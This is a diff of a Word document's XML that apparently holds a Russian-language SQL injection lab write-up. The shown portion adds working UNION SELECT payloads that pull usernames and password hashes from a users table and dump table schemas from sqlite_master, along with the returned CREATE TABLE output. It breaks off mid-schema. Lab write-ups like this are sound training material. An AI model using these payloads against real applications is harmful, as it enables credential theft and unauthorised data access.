+        <w:t xml:space="preserve"> FROM user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>—</w:t>
@@ -782,12 +1514,186 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>username,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM users LIMIT 1 OFFSET 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hash</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM users LIMIT 1 OFFSET 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="357"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>структуру</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>таблицы</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sequence</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -798,34 +1704,31 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' UNION</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql,NULL</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>name,NULL,NULL</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="red"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> FROM </w:t>
@@ -833,7 +1736,6 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="red"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>sqlite_master</w:t>
@@ -841,10 +1743,23 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="red"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE type='table' LIMIT 1 OFFSET 4--</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE name='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_sequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'--</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -857,14 +1772,126 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:t>Для</w:t>
-      </w:r>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CREATE </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">TABLE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_sequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>name,seq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_sequence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -872,34 +1899,388 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>вывода</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LIMIT 1 OFFSET 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Выводяться</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> названия таблиц</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>всех</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>структуру</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>таблиц</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>таблицы</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>используется</w:t>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE name='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CREATE TABLE products (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id INTEG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>name TEXT NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>description TEXT NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>price_cents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NO</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>T NULL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>products</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LIMIT 1 OFFSET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>4--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Выводит продукты</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Узнаем</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -908,7 +2289,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>функция</w:t>
+        <w:t>структуру</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -917,7 +2298,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>объединения</w:t>
+        <w:t>таблицы</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -929,7 +2310,307 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>–</w:t>
+        <w:t>reviews</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' UNION SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,NULL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sqlite_master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE name='</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>reviews</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'--</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Результат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CREATE TABLE reviews (</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>id INTEG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ER PRIMARY KEY AUTOINCREMENT,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>product_id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> INTEGER NOT NULL,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
